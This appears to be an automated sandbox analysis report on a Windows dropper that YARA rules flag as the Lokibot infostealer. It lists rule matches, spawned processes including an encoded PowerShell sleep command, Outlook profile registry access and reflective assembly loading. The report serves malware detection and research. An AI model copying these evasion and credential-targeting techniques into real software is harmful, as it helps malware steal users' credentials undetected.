Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Code function: 0_2_0176A5A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Code function: 0_2_0176CDE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0493B540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04933C00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0493E8F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04933C00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_072C23E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_072C3148
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_072C4F70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_072CA409

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.511627239.0000000004FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJaabwufwrbhhwmkpgfuy.dll" vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519535055.000000000312E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000000.257527160.0000000000DA5000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLgrdypvg.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.514692941.0000000001158000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Binary or memory string: OriginalFilenameLgrdypvg.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

ReversingLabs: Detection: 14%

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk3bso0d.u4o.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/9@21/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, u0005.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.d60000.0.unpack, u0005.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

